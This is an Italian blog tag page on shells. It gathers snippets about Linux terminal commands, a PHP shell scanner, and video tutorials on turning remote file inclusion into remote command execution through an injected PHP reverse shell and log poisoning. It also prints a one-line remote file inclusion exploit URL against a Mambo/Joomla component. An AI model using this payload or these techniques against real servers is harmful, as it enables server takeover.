Articoli marcati con tag ‘shell’
31 agosto 2010 | 
Autore: Il terminale dei sistemi operativi GNU/LINUX è qualcosa di eccezionale: con una semplice riga di codice potete spostare,copiare,rinominare,eliminare etc i vari file presenti nel vostro sistema.
Ho deciso di stilare una lista dei comandi più importanti con la relativa descrizione dell'azione che eseguono.
Pubblicato in 
Tag: 
http://{PAGE}/mambots/content/josowbot.content.php?mosConfig_absolute_path={SHELL}
XPL:/mambots/content/josowbot.content.php?mosConfig_absolute_path=
Video tutorial che illustra come effettuare RCE (Remote Command Execution) su un web server su cui è presente una pagina PHP vulnerabile a RFI (Remote File Inclusion), ovvero con funzioni per l'inclusione di file con input a discrezione dall'utente e non validato. In questo caso, osserveremo la pericolosità di questa vulnerabilità, esaminando come è possibile iniettare una reverse shell scritta in PHP e inviare quindi comandi arbitrari all'host.
Link per il download: http://www.mediafire.com/?njszestd3zo
Crediti: Vincy
Video tutorial che illustra come iniettare una shell PHP su un server web avente uno script che effettua il logging su un file PHP che è possibile richiamare in maniera diretta via browser (log poisoning).
Download: clicca quì
Crediti: Vincy
Michele
Sto recuperando tanto materiale interessante nel web per riproporlo di nuovo a voi 
Clicca qui per vedere il codice del php shell scanner.
Che cos'è?
E' uno script in php che cerca e trova,se ci sono,le shell sul vostro hosting.Una shell è un file in PHP che ti permette di usare dei comandi come in un normale file manager.
Questo script è utile per le persone che dispongono di un sito di upload file.
Michele
queste procedure andrebbero fatte sempre!
